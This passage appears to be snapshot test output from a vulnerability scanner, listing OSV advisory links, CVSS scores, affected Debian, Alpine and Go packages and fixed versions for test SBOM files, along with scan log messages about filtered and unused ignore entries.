testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | 
https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 
5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian 
| tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+---------------------------------------------------------------------+ --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file#01 - 2] --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_multiple_files - 1] Scanning dir testdata/sbom-insecure/alpine.cdx.xml Scanning dir testdata/sbom-insecure/postgres-stretch.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 2 local/unscannable package/s from the scan. CVE-2025-26519 and 1 alias have been filtered out because: (no reason given) CVE-2018-25032 and 1 alias have been filtered out because: (no reason given) CVE-2022-1304 and 2 aliases have been filtered out because: (no reason given) GO-2022-0274 and 2 aliases have been filtered out because: (no reason given) Filtered 6 vulnerabilities from output testdata/osv-scanner-partial-ignores-config.toml has unused ignores: - CVE-2019-5188 Total 22 packages affected by 169 known vulnerabilities (19 Critical, 70 High, 53 Medium, 3 Low, 24 Unknown) from 3 ecosystems. 10 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 